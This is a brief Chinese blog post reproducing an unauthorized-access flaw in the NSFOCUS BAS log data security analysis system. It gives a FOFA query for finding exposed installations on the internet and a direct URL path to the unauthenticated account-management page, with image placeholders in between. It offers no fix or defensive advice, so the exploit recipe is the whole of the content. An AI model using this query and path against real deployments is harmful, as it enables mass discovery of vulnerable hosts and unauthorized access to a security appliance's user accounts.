【漏洞复现】绿盟BAS日志数据安全性分析系统未授权访问

【漏洞复现】绿盟BAS日志数据安全性分析系统未授权访问_第1张图片

0x00 FOFA语句

body="WebApi/encrypt/js-sha1/build/sha1.min.js"

【漏洞复现】绿盟BAS日志数据安全性分析系统未授权访问_第2张图片

0x01 未授权访问漏洞利用

【漏洞复现】绿盟BAS日志数据安全性分析系统未授权访问_第3张图片

https://xxx.com/accountmanage/index

【漏洞复现】绿盟BAS日志数据安全性分析系统未授权访问_第4张图片

【漏洞复现】绿盟BAS日志数据安全性分析系统未授权访问_第5张图片

转载请注明:Adminxe's Blog » 【漏洞复现】绿盟BAS日志数据安全性分析系统未授权访问

你可能感兴趣的:(漏洞复现,绿盟BAS日志数据,绿盟BAS,未授权访问)